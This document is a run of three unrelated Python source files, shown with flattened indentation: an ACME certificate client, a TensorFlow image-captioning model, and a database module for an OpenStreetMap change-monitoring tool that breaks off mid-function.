from six.moves import http_client # pylint: disable=import-error
import OpenSSL
import requests
import sys
import werkzeug
from acme import errors
from acme import jose
from acme import jws
from acme import messages
logger = logging.getLogger(__name__)
# Prior to Python 2.7.9 the stdlib SSL module did not allow a user to configure
# many important security related options. On these platforms we use PyOpenSSL
# for SSL, which does allow these options to be configured.
# https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning
if sys.version_info < (2, 7, 9): # pragma: no cover
requests.packages.urllib3.contrib.pyopenssl.inject_into_urllib3()
class Client(object): # pylint: disable=too-many-instance-attributes
"""ACME client.
.. todo::
Clean up raised error types hierarchy, document, and handle (wrap)
instances of `.DeserializationError` raised in `from_json()`.
:ivar messages.Directory directory:
:ivar key: `.JWK` (private)
:ivar alg: `.JWASignature`
:ivar bool verify_ssl: Verify SSL certificates?
:ivar .ClientNetwork net: Client network. Useful for testing. If not
supplied, it will be initialized using `key`, `alg` and
`verify_ssl`.
"""
DER_CONTENT_TYPE = 'application/pkix-cert'
def __init__(self, directory, key, alg=jose.RS256, verify_ssl=True,
net=None):
"""Initialize.
:param directory: Directory Resource (`.messages.Directory`) or
URI from which the resource will be downloaded.
"""
self.key = key
self.net = ClientNetwork(key, alg, verify_ssl) if net is None else net
if isinstance(directory, six.string_types):
self.directory = messages.Directory.from_json(
self.net.get(directory).json())
else:
self.directory = directory
@classmethod
def _regr_from_response(cls, response, uri=None, new_authzr_uri=None,
terms_of_service=None):
terms_of_service = (
response.links['terms-of-service']['url']
if 'terms-of-service' in response.links else terms_of_service)
if new_authzr_uri is None:
try:
new_authzr_uri = response.links['next']['url']
except KeyError:
raise errors.ClientError('"next" link missing')
return messages.RegistrationResource(
body=messages.Registration.from_json(response.json()),
uri=response.headers.get('Location', uri),
new_authzr_uri=new_authzr_uri,
terms_of_service=terms_of_service)
def register(self, new_reg=None):
"""Register.
:param .NewRegistration new_reg:
:returns: Registration Resource.
:rtype: `.RegistrationResource`
:raises .UnexpectedUpdate:
"""
new_reg = messages.NewRegistration() if new_reg is None else new_reg
assert isinstance(new_reg, messages.NewRegistration)
response = self.net.post(self.directory[new_reg], new_reg)
# TODO: handle errors
assert response.status_code == http_client.CREATED
# "Instance of 'Field' has no key/contact member" bug:
# pylint: disable=no-member
regr = self._regr_from_response(response)
if (regr.body.key != self.key.public_key() or
regr.body.contact != new_reg.contact):
raise errors.UnexpectedUpdate(regr)
return regr
def _send_recv_regr(self, regr, body):
response = self.net.post(regr.uri, body)
# TODO: Boulder returns httplib.ACCEPTED
#assert response.status_code == httplib.OK
# TODO: Boulder does not set Location or Link on update
# (c.f. acme-spec #94)
return self._regr_from_response(
response, uri=regr.uri, new_authzr_uri=regr.new_authzr_uri,
terms_of_service=regr.terms_of_service)
def update_registration(self, regr, update=None):
"""Update registration.
:param messages.RegistrationResource regr: Registration Resource.
:param messages.Registration update: Updated body of the
resource. If not provided, body will be taken from `regr`.
:returns: Updated Registration Resource.
:rtype: `.RegistrationResource`
"""
update = regr.body if update is None else update
updated_regr = self._send_recv_regr(
regr, body=messages.UpdateRegistration(**dict(update)))
if updated_regr != regr:
raise errors.UnexpectedUpdate(regr)
return updated_regr
def query_registration(self, regr):
"""Query server about registration.
:param messages.RegistrationResource: Existing Registration
Resource.
"""
return self._send_recv_regr(regr, messages.UpdateRegistration())
def agree_to_tos(self, regr):
"""Agree to the terms-of-service.
Agree to the terms-of-service in a Registration Resource.
:param regr: Registration Resource.
:type regr: `.RegistrationResource`
:returns: Updated Registration Resource.
:rtype: `.RegistrationResource`
"""
return self.update_registration(
regr.update(body=regr.body.update(agreement=regr.terms_of_service)))
def _authzr_from_response(self, response, identifier,
uri=None, new_cert_uri=None):
# pylint: disable=no-self-use
if new_cert_uri is None:
try:
new_cert_uri = response.links['next']['url']
except KeyError:
raise errors.ClientError('"next" link missing')
authzr = messages.AuthorizationResource(
body=messages.Authorization.from_json(response.json()),
uri=response.headers.get('Location', uri),
new_cert_uri=new_cert_uri)
if authzr.body.identifier != identifier:
raise errors.UnexpectedUpdate(authzr)
return authzr
def request_challenges(self, identifier, new_authzr_uri):
"""Request challenges.
:param identifier: Identifier to be challenged.
:type identifier: `.messages.Identifier`
:param str new_authzr_uri: new-authorization URI
:returns: Authorization Resource.
:rtype: `.AuthorizationResource`
"""
new_authz = messages.NewAuthorization(identifier=identifier)
response = self.net.post(new_authzr_uri, new_authz)
# TODO: handle errors
assert response.status_code == http_client.CREATED
return self._authzr_from_response(response, identifier)
def request_domain_challenges(self, domain, new_authz_uri):
"""Request challenges for domain names.
This is simply a convenience function that wraps around
`request_challenges`, but works with domain names instead of
generic identifiers.
:param str domain: Domain name to be challenged.
:param str new_authzr_uri: new-authorization URI
:returns: Authorization Resource.
:rtype: `.AuthorizationResource`
"""
return self.request_challenges(messages.Identifier(
typ=messages.IDENTIFIER_FQDN, value=domain), new_authz_uri)
def answer_challenge(self, challb, response):
"""Answer challenge.
:param challb: Challenge Resource body.
:type challb: `.ChallengeBody`
:param response: Corresponding Challenge response
:type response: `.challenges.ChallengeResponse`
:returns: Challenge Resource with updated body.
:rtype: `.ChallengeResource`
:raises .UnexpectedUpdate:
"""
response = self.net.post(challb.uri, response)
try:
authzr_uri = response.links['up']['url']
except KeyError:
raise errors.ClientError('"up" Link header missing')
challr = messages.ChallengeResource(
authzr_uri=authzr_uri,
body=messages.ChallengeBody.from_json(response.json()))
# TODO: check that challr.uri == response.headers['Location']?
if challr.uri != challb.uri:
raise errors.UnexpectedUpdate(challr.uri)
return challr
@classmethod
def retry_after(cls, response, default):
"""Compute next `poll` time based on response ``Retry-After`` header.
:param requests.Response response: Response from `poll`.
:param int default: Default value (in seconds), used when
``Retry-After`` header is not present or invalid.
:returns: Time point when next `poll` should be performed.
:rtype: `datetime.datetime`
"""
retry_after = response.headers.get('Retry-After', str(default))
try:
seconds = int(retry_after)
except ValueError:
# pylint: disable=no-member
decoded = werkzeug.parse_date(retry_after) # RFC1123
if decoded is None:
seconds = default
else:
return decoded
return datetime.datetime.now() + datetime.timedelta(seconds=seconds)
def poll(self, authzr):
"""Poll Authorization Resource for status.
:param authzr: Authorization Resource
:type authzr: `.AuthorizationResource`
:returns: Updated Authorization Resource and HTTP response.
:rtype: (`.AuthorizationResource`, `requests.Response`)
"""
response = self.net.get(authzr.uri)
updated_authzr = self._authzr_from_response(
response, authzr.body.identifier, authzr.uri, authzr.new_cert_uri)
# TODO: check and raise UnexpectedUpdate
return updated_authzr, response
def request_issuance(self, csr, authzrs):
"""Request issuance.
:param csr: CSR
:type csr: `OpenSSL.crypto.X509Req` wrapped in `.ComparableX509`
:param authzrs: `list` of `.AuthorizationResource`
:returns: Issued certificate
:rtype: `.messages.CertificateResource`
"""
assert authzrs, "Authorizations list is empty"
logger.debug("Requesting issuance...")
# TODO: assert len(authzrs) == number of SANs
req = messages.CertificateRequest(csr=csr)
content_type = self.DER_CONTENT_TYPE # TODO: add 'cert_type 'argument
response = self.net.post(
authzrs[0].new_cert_uri, # TODO: acme-spec #90
req,
content_type=content_type,
headers={'Accept': content_type})
cert_chain_uri = response.links.get('up', {}).get('url')
try:
uri = response.headers['Location']
except KeyError:
raise errors.ClientError('"Location" Header missing')
return messages.CertificateResource(
uri=uri, authzrs=authzrs, cert_chain_uri=cert_chain_uri,
body=jose.ComparableX509(OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_ASN1, response.content)))
def poll_and_request_issuance(
self, csr, authzrs, mintime=5, max_attempts=10):
"""Poll and request issuance.
This function polls all provided Authorization Resource URIs
until all challenges are valid, respecting ``Retry-After`` HTTP
headers, and then calls `request_issuance`.
:param .ComparableX509 csr: CSR (`OpenSSL.crypto.X509Req`
wrapped in `.ComparableX509`)
:param authzrs: `list` of `.AuthorizationResource`
:param int mintime: Minimum time before next attempt, used if
``Retry-After`` is not present in the response.
:param int max_attempts: Maximum number of attempts before
`PollError` with non-empty ``waiting`` is raised.
:returns: ``(cert, updated_authzrs)`` `tuple` where ``cert`` is
the issued certificate (`.messages.CertificateResource`),
and ``updated_authzrs`` is a `tuple` consisting of updated
Authorization Resources (`.AuthorizationResource`) as
present in the responses from server, and in the same order
as the input ``authzrs``.
:rtype: `tuple`
:raises PollError: in case of timeout or if some authorization
was marked by the CA as invalid
"""
# priority queue with datetime (based on Retry-After) as key,
# and original Authorization Resource as value
waiting = [(datetime.datetime.now(), authzr) for authzr in authzrs]
# mapping between original Authorization Resource and the most
# recently updated one
updated = dict((authzr, authzr) for authzr in authzrs)
while waiting and max_attempts:
max_attempts -= 1
# find the smallest Retry-After, and sleep if necessary
when, authzr = heapq.heappop(waiting)
now = datetime.datetime.now()
if when > now:
seconds = (when - now).seconds
logger.debug('Sleeping for %d seconds', seconds)
time.sleep(seconds)
# Note that we poll with the latest updated Authorization
# URI, which might have a different URI than initial one
updated_authzr, response = self.poll(updated[authzr])
updated[authzr] = updated_authzr
# pylint: disable=no-member
if updated_authzr.body.status not in (
messages.STATUS_VALID, messages.STATUS_INVALID):
# push back to the priority queue, with updated retry_after
heapq.heappush(waiting, (self.retry_after(
response, default=mintime), authzr))
if not max_attempts or any(authzr.body.status == messages.STATUS_INVALID
for authzr in six.itervalues(updated)):
raise errors.PollError(waiting, updated)
updated_authzrs = tuple(updated[authzr] for authzr in authzrs)
return self.request_issuance(csr, updated_authzrs), updated_authzrs
def _get_cert(self, uri):
"""Returns certificate from URI.
:param str uri: URI of certificate
:returns: tuple of the form
(response, :class:`acme.jose.ComparableX509`)
:rtype: tuple
"""
content_type = self.DER_CONTENT_TYPE # TODO: make it a param
response = self.net.get(uri, headers={'Accept': content_type},
content_type=content_type)
return response, jose.ComparableX509(OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_ASN1, response.content))
def check_cert(self, certr):
"""Check for new cert.
:param certr: Certificate Resource
:type certr: `.CertificateResource`
:returns: Updated Certificate Resource.
:rtype: `.CertificateResource`
"""
# TODO: acme-spec 5.1 table action should be renamed to
# "refresh cert", and this method integrated with self.refresh
response, cert = self._get_cert(certr.uri)
if 'Location' not in response.headers:
raise errors.ClientError('Location header missing')
if response.headers['Location'] != certr.uri:
raise errors.UnexpectedUpdate(response.text)
return certr.update(body=cert)
def refresh(self, certr):
"""Refresh certificate.
:param certr: Certificate Resource
:type certr: `.CertificateResource`
:returns: Updated Certificate Resource.
:rtype: `.CertificateResource`
"""
# TODO: If a client sends a refresh request and the server is
# not willing to refresh the certificate, the server MUST
# respond with status code 403 (Forbidden)
return self.check_cert(certr)
def fetch_chain(self, certr, max_length=10):
"""Fetch chain for certificate.
:param .CertificateResource certr: Certificate Resource
:param int max_length: Maximum allowed length of the chain.
Note that each element in the certificate requires new
``HTTP GET`` request, and the length of the chain is
controlled by the ACME CA.
:raises errors.Error: if recursion exceeds `max_length`
:returns: Certificate chain for the Certificate Resource. It is
a list ordered so that the first element is a signer of the
certificate from Certificate Resource. Will be empty if
``cert_chain_uri`` is ``None``.
:rtype: `list` of `OpenSSL.crypto.X509` wrapped in `.ComparableX509`
"""
chain = []
uri = certr.cert_chain_uri
while uri is not None and len(chain) < max_length:
response, cert = self._get_cert(uri)
uri = response.links.get('up', {}).get('url')
chain.append(cert)
if uri is not None:
raise errors.Error(
"Recursion limit reached. Didn't get {0}".format(uri))
return chain
def revoke(self, cert):
"""Revoke certificate.
:param .ComparableX509 cert: `OpenSSL.crypto.X509` wrapped in
`.ComparableX509`
:raises .ClientError: If revocation is unsuccessful.
"""
response = self.net.post(self.directory[messages.Revocation],
messages.Revocation(certificate=cert),
content_type=None)
if response.status_code != http_client.OK:
raise errors.ClientError(
'Successful revocation must return HTTP OK status')
class ClientNetwork(object):
"""Client network."""
JSON_CONTENT_TYPE = 'application/json'
JSON_ERROR_CONTENT_TYPE = 'application/problem+json'
REPLAY_NONCE_HEADER = 'Replay-Nonce'
def __init__(self, key, alg=jose.RS256, verify_ssl=True,
user_agent='acme-python'):
self.key = key
self.alg = alg
self.verify_ssl = verify_ssl
self._nonces = set()
self.user_agent = user_agent
def _wrap_in_jws(self, obj, nonce):
"""Wrap `JSONDeSerializable` object in JWS.
.. todo:: Implement ``acmePath``.
:param .JSONDeSerializable obj:
:param bytes nonce:
:rtype: `.JWS`
"""
jobj = obj.json_dumps().encode()
logger.debug('Serialized JSON: %s', jobj)
return jws.JWS.sign(
payload=jobj, key=self.key, alg=self.alg, nonce=nonce).json_dumps()
@classmethod
def _check_response(cls, response, content_type=None):
"""Check response content and its type.
.. note::
Checking is not strict: wrong server response ``Content-Type``
HTTP header is ignored if response is an expected JSON object
(c.f. Boulder #56).
:param str content_type: Expected Content-Type response header.
If JSON is expected and not present in server response, this
function will raise an error. Otherwise, wrong Content-Type
is ignored, but logged.
:raises .messages.Error: If server response body
carries HTTP Problem (draft-ietf-appsawg-http-problem-00).
:raises .ClientError: In case of other networking errors.
"""
logger.debug('Received response %s (headers: %s): %r',
response, response.headers, response.content)
response_ct = response.headers.get('Content-Type')
try:
# TODO: response.json() is called twice, once here, and
# once in _get and _post clients
jobj = response.json()
except ValueError as error:
jobj = None
if not response.ok:
if jobj is not None:
if response_ct != cls.JSON_ERROR_CONTENT_TYPE:
logger.debug(
'Ignoring wrong Content-Type (%r) for JSON Error',
response_ct)
try:
raise messages.Error.from_json(jobj)
except jose.DeserializationError as error:
# Couldn't deserialize JSON object
raise errors.ClientError((response, error))
else:
# response is not JSON object
raise errors.ClientError(response)
else:
if jobj is not None and response_ct != cls.JSON_CONTENT_TYPE:
logger.debug(
'Ignoring wrong Content-Type (%r) for JSON decodable '
'response', response_ct)
if content_type == cls.JSON_CONTENT_TYPE and jobj is None:
raise errors.ClientError(
'Unexpected response Content-Type: {0}'.format(response_ct))
return response
def _send_request(self, method, url, *args, **kwargs):
"""Send HTTP request.
Makes sure that `verify_ssl` is respected. Logs request and
response (with headers). For allowed parameters please see
`requests.request`.
:param str method: method for the new `requests.Request` object
:param str url: URL for the new `requests.Request` object
:raises requests.exceptions.RequestException: in case of any problems
:returns: HTTP Response
:rtype: `requests.Response`
"""
logging.debug('Sending %s request to %s. args: %r, kwargs: %r',
method, url, args, kwargs)
kwargs['verify'] = self.verify_ssl
kwargs.setdefault('headers', {})
kwargs['headers'].setdefault('User-Agent', self.user_agent)
response = requests.request(method, url, *args, **kwargs)
logging.debug('Received %s. Headers: %s. Content: %r',
response, response.headers, response.content)
return response
def head(self, *args, **kwargs):
"""Send HEAD request without checking the response.
Note, that `_check_response` is not called, as it is expected
that status code other than successfully 2xx will be returned, or
messages2.Error will be raised by the server.
"""
return self._send_request('HEAD', *args, **kwargs)
def get(self, url, content_type=JSON_CONTENT_TYPE, **kwargs):
"""Send GET request and check response."""
return self._check_response(
self._send_request('GET', url, **kwargs), content_type=content_type)
def _add_nonce(self, response):
if self.REPLAY_NONCE_HEADER in response.headers:
nonce = response.headers[self.REPLAY_NONCE_HEADER]
try:
decoded_nonce = jws.Header._fields['nonce'].decode(nonce)
except jose.DeserializationError as error:
raise errors.BadNonce(nonce, error)
logger.debug('Storing nonce: %r', decoded_nonce)
self._nonces.add(decoded_nonce)
else:
raise errors.MissingNonce(response)
def _get_nonce(self, url):
if not self._nonces:
logging.debug('Requesting fresh nonce')
self._add_nonce(self.head(url))
return self._nonces.pop()
def post(self, url, obj, content_type=JSON_CONTENT_TYPE, **kwargs):
"""POST object wrapped in `.JWS` and check response."""
data = self._wrap_in_jws(obj, self._get_nonce(url))
response = self._send_request('POST', url, data=data, **kwargs)
self._add_nonce(response)
return self._check_response(response, content_type=content_type)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Standard Imports
import tensorflow as tf
import image_embedding
import image_processing
import inputs as input_ops
class ShowAndTellModel(object):
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
def __init__(self, config, mode, train_inception=False):
"""Basic setup.
Args:
config: Object containing configuration parameters.
mode: "train", "eval" or "inference".
train_inception: Whether the inception submodel variables are trainable.
"""
assert mode in ["train", "eval", "inference"]
self.config = config
self.mode = mode
self.train_inception = train_inception
# To match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer.
self.initializer = tf.random_uniform_initializer(
minval=-self.config.initializer_scale,
maxval=self.config.initializer_scale)
# A float32 Tensor with shape [batch_size, height, width, channels].
self.images = None
# An int32 Tensor with shape [batch_size, padded_length].
self.input_seqs = None
# An int32 Tensor with shape [batch_size, padded_length].
self.target_seqs = None
# An int32 0/1 Tensor with shape [batch_size, padded_length].
self.input_mask = None
# A float32 Tensor with shape [batch_size, embedding_size].
self.image_embeddings = None
# A float32 Tensor with shape [batch_size, padded_length, embedding_size].
self.seq_embeddings = None
# A float32 scalar Tensor; the total loss for the trainer to optimize.
self.total_loss = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_losses = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_loss_weights = None
# Collection of variables from the inception submodel.
self.inception_variables = []
# Function to restore the inception submodel from checkpoint.
self.init_fn = None
# Global step Tensor.
self.global_step = None
def is_training(self):
"""Returns true if the model is built for training mode."""
return self.mode == "train"
def load_image(self, encoded_image, thread_id=0):
"""Decodes and processes an image string.
Args:
encoded_image: A scalar string Tensor; the encoded image.
thread_id: Preprocessing thread id used to select the ordering of color
distortions.
Returns:
A float32 Tensor of shape [height, width, 3]; the processed image.
"""
return image_processing.process_image(
encoded_image,
is_training=self.is_training(),
height=self.config.image_height,
width=self.config.image_width,
thread_id=thread_id,
image_format=self.config.image_format)
def distort_images(self, images, seed):
"""Distort a batch of images.
(Processing a batch allows us to easily switch between TPU and CPU
execution).
"""
if self.mode == "train":
images = image_processing.distort_image(images, seed)
# Rescale to [-1,1] instead of [0, 1]
images = tf.subtract(images, 0.5)
images = tf.multiply(images, 2.0)
return images
def build_inputs(self):
"""Input prefetching, preprocessing and batching.
Outputs:
self.images
self.input_seqs
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
"""
if self.mode == "inference":
# In inference mode, images and inputs are fed via placeholders.
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(
dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# Process image and insert batch dimensions.
images = tf.expand_dims(self.load_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# No target sequences or input mask in inference mode.
target_seqs = None
input_mask = None
else:
def _load_example(serialized_example):
encoded_image, caption = input_ops.parse_example(
serialized_example,
image_feature=self.config.image_feature_name,
caption_feature=self.config.caption_feature_name)
image = self.load_image(encoded_image)
# strings.split expects a batch
words = tf.strings.split(tf.reshape(caption, [1]), sep=" ")
words = tf.sparse_tensor_to_dense(words, default_value="")[0]
word_idx = tf.strings.to_hash_bucket(words, self.config.vocab_size)
input_seqs, target_seqs, input_mask = input_ops.pad_caption_to_input(
word_idx)
return image, input_seqs, target_seqs, input_mask
def _load_dataset(filename):
return tf.data.TFRecordDataset(filename, buffer_size=16 * 1024 * 1024)
df = tf.data.Dataset.list_files(
self.config.input_file_pattern, shuffle=self.mode == "train")
df = df.apply(
tf.data.experimental.parallel_interleave(
_load_dataset, cycle_length=64, sloppy=True))
if self.mode == "train":
df = df.repeat()
df = df.shuffle(1024)
df = df.apply(
tf.data.experimental.map_and_batch(
_load_example,
self.config.batch_size,
num_parallel_batches=8,
drop_remainder=True))
df = df.prefetch(8)
images, input_seqs, target_seqs, input_mask = df.make_one_shot_iterator(
).get_next()
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
def build_image_embeddings(self, images):
"""Builds the image model subgraph and generates image embeddings.
Inputs:
images
Outputs:
self.image_embeddings
"""
images = self.distort_images(images, tf.train.get_or_create_global_step())
inception_output = image_embedding.inception_v3(
images,
trainable=self.train_inception,
is_training=self.is_training(),
add_summaries=False)
self.inception_variables = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# Map inception output into embedding space.
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=inception_output,
num_outputs=self.config.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# Save the embedding size in the graph.
tf.constant(self.config.embedding_size, name="embedding_size")
return image_embeddings
def build_seq_embeddings(self, input_seqs):
"""Builds the input sequence embeddings.
Inputs:
input_seqs
Outputs:
self.seq_embeddings
"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.config.vocab_size, self.config.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, input_seqs)
return seq_embeddings
def build_model(self):
"""Builds the model.
Inputs:
self.image_embeddings
self.seq_embeddings
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
Outputs:
self.total_loss (training and eval only)
self.target_cross_entropy_losses (training and eval only)
self.target_cross_entropy_loss_weights (training and eval only)
"""
# This LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.config.num_lstm_units, state_is_tuple=True)
if self.mode == "train":
lstm_cell = tf.contrib.rnn.DropoutWrapper(
lstm_cell,
input_keep_prob=self.config.lstm_dropout_keep_prob,
output_keep_prob=self.config.lstm_dropout_keep_prob)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# Feed the image embeddings to set the initial LSTM state.
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# Allow the LSTM variables to be reused.
lstm_scope.reuse_variables()
if self.mode == "inference":
# In inference mode, use concatenated states for convenient feeding and
# fetching.
tf.concat(initial_state, 1, name="initial_state")
# Placeholder for feeding a batch of concatenated states.
state_feed = tf.placeholder(
dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# Run a single LSTM step.
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, squeeze_dims=[1]),
state=state_tuple)
# Concatentate the resulting state.
tf.concat(state_tuple, 1, name="state")
else:
# Run the batch of sequence embeddings through the LSTM.
sequence_length = tf.reduce_sum(self.input_mask, 1)
lstm_outputs, _ = tf.nn.dynamic_rnn(
cell=lstm_cell,
inputs=self.seq_embeddings,
sequence_length=sequence_length,
initial_state=initial_state,
dtype=tf.float32,
scope=lstm_scope)
# Stack batches vertically.
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.config.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
if self.mode == "inference":
tf.nn.softmax(logits, name="softmax")
else:
targets = tf.reshape(self.target_seqs, [-1])
weights = tf.to_float(tf.reshape(self.input_mask, [-1]))
# Compute losses.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
batch_loss = tf.div(
tf.reduce_sum(tf.multiply(losses, weights)),
tf.reduce_sum(weights),
name="batch_loss")
tf.losses.add_loss(batch_loss)
total_loss = tf.losses.get_total_loss()
self.total_loss = total_loss
self.target_cross_entropy_losses = losses # Used in evaluation.
self.target_cross_entropy_loss_weights = weights # Used in evaluation.
def setup_inception_initializer(self):
"""Sets up the function to restore inception variables from checkpoint."""
if self.mode != "inference":
# Restore inception variables only.
saver = tf.train.Saver(self.inception_variables)
def restore_fn(sess):
tf.logging.info("Restoring Inception variables from checkpoint file %s",
self.config.inception_checkpoint_file)
saver.restore(sess, self.config.inception_checkpoint_file)
self.init_fn = restore_fn
def setup_global_step(self):
"""Sets up the global step Tensor."""
self.global_step = tf.train.get_or_create_global_step()
def build_model_for_tpu(self, images, input_seqs, target_seqs, input_mask):
self.image_embeddings = self.build_image_embeddings(images)
self.seq_embeddings = self.build_seq_embeddings(target_seqs)
self.target_seqs = target_seqs
self.input_mask = input_mask
self.build_model()
def build(self):
"""Creates all ops for training and evaluation."""
self.build_inputs()
self.image_embeddings = self.build_image_embeddings(self.images)
self.seq_embeddings = self.build_seq_embeddings(self.input_seqs)
self.build_model()
self.setup_inception_initializer()
self.setup_global_step()
|
|
"""
db.py
Functions that interact with the database.
"""
from osmhm import connect
def add_watched_user(username, reason=None, author=None, authorid=None, email=None):
"""
Add user to watched user list for tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_users
(username, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_user(username, authorid=None):
"""
Remove user from tracking list associated with authorid.
Inputs
------
username : str
Username to remove from database
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM watched_users WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_watched_user_event(changeset, wid):
"""
Add watched user event.
Inputs
------
changeset : dict
Information about user event
wid : int
Watched object ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['id'], changeset['timestamp'], changeset['uid'],
changeset['create'], changeset['modify'], changeset['delete'])
cur.execute("""INSERT INTO history_users
(wid, changeset, timestamp, userid, created, modified, \
deleted) VALUES (%s, %s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def add_watched_user_object(username, reason=None, author=None, authorid=None, email=None):
"""
Add user to watched user list with object composites for tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_users_objects
(username, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_user_object(username, authorid=None):
"""
Remove user from object composite user tracking list
associated with authorid.
Inputs
------
username : str
Username to remove from database
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM watched_users_objects WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_watched_object(element, reason=None, author=None, authorid=None, email=None):
"""
Add object to watched object list.
Inputs
------
element : str
Object to track, with type specified as single letter
prepended to object id (e.g. node 322 is 'n322')
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (element, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_objects
(element, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_object(element, authorid=None):
"""
Remove object from object tracking list associated with authorid.
Inputs
------
element : str
Object to track, with type specified as single letter
prepended to object id (e.g. node 322 is 'n322')
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (element, authorid)
cur.execute("""DELETE FROM watched_objects WHERE
element = %s and authorid = %s;""", info)
conn.commit()
def add_watched_object_event(changeset, wid):
"""
Add watched object event.
Inputs
------
changeset : dict
Information about object event
wid : int
Watched object ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['timestamp'],
changeset['username'].encode('utf8'), changeset['uid'],
changeset['action'], changeset['changeset'])
cur.execute("""INSERT INTO history_objects
(wid, timestamp, username, userid, action, changeset)
VALUES (%s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def add_watched_key(key, value, reason=None, author=None, authorid=None, email=None):
"""
Add key/value combination to key/value tracking list.
Inputs
------
key : str
Key to track; can be wildcard
value : str
Key value to track; can be wildcard
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (key, value, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_keys
(key, value, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_key(key, value, authorid=None):
"""
Remove object from object tracking list associated with authorid.
Inputs
------
key : str
Key to remove
value : str
Key value to remove
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (key, value, authorid)
cur.execute("""DELETE FROM watched_keys WHERE
key = %s and value = %s and authorid = %s;""", info)
conn.commit()
def add_watched_key_event(changeset, key, wid):
"""
Add watched key event.
Inputs
------
changeset : dict
Information about key event
wid : int
Watched key ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['id'], changeset['timestamp'],
